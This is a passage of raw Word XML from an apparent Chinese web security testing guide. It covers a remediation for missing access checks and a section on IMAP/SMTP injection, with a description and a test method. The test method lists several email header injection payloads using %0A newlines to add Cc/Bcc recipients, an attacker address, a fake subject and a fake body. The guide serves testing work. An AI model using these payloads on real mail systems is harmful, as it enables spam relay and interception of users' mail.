          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00F2376A" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于每一个访问的接口都首先检查当前用户是否已经登录</w:t>
      </w:r>
      <w:r w:rsidR="00FE586C" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并授权</w:t>
      </w:r>
      <w:r w:rsidR="00F2376A" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（不需要认证的</w:t>
      </w:r>
      <w:r w:rsidR="00FE586C" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口除外，例如，免费下载接口</w:t>
      </w:r>
      <w:r w:rsidR="00F2376A" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
      <w:r w:rsidR="00A862A8" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21150D68" w14:textId="48D092D5" w:rsidR="00BD5E6D" w:rsidRPr="00844517" w:rsidRDefault="00BD5E6D" w:rsidP="00844517">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856CDCB" w14:textId="5BCF6CCC" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="009145B3" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc498434515"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="42619464" w14:textId="67713190" w:rsidR="00EE4690" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和广为人知的诸如</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入、</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入等技术类似，邮件服务器注入技术也是通过一个对用户提供的数据没有严格检查的</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webmail</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序将</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMAP</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令或者</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令注入到邮件服务器。要向邮件服务器注入命令，前提条件是允许用户通过</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webmail</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序访问其端口</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>143</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IMAP</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E742D09" w14:textId="444C5155" w:rsidR="00032160" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要利用</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注射，用户必须事先通过认证，所以用户必须有一个有效的</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webmail</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐户。通过</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00032160" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送电子邮件消息的格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59937F45" w14:textId="77777777" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="00032160" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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发送方的</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e-mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidR="004362E9" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E98AFB" w14:textId="77777777" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="00032160" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接收方的</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e-mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidR="004362E9" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3CF451" w14:textId="77777777" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="00032160" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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主题</w:t>
      </w:r>
      <w:r w:rsidR="004362E9" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D0CCB" w14:textId="77777777" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="00032160" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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消息主体</w:t>
      </w:r>
      <w:r w:rsidR="004362E9" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0A07D" w14:textId="7C507C1E" w:rsidR="00032160" w:rsidRPr="00844517" w:rsidRDefault="00032160" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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附件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C0EB8" w14:textId="3DEA589F" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="004362E9" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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CC/BCC</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在发送者字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(sender)</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后注入</w:t>
      </w:r>
      <w:r w:rsidR="00F53EAA" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00F53EAA" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>From:sender@domain.com%0ACc:recipient@domain.com%0ABcc:recipient1@domain.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息将被发送到</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recipient</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recipient1</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D7114" w14:textId="2FE84475" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="004362E9" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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参数注射</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>From:sender@domain.com%0ATo:attacker@domain.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在消息将被发送到原来的收件人和攻击者帐户。注意，这里的攻击者的账户是我们通过注入额外传入的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67DAA3" w14:textId="729C8525" w:rsidR="004362E9" w:rsidRPr="00844517" w:rsidRDefault="004362E9" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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邮件主题注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>From:sender@domain.com%0ASubject:This</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s%20Fake%20Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者注入的假的主题</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将被添加到原来的主题中并且在某些情况下将取代原本的主题</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这取决于邮件服务行为。即代码编写的容错性，当参数中出现两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候代码是选择丢弃还是后者覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35216DAB" w14:textId="04F9CED8" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="004362E9" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>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改变消息的主体</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式，消息主题和头部</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间有两个换行符</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一样的</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假消息将被添加到原始消息中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7583E432" w14:textId="4D88E1F0" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="00C24790" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
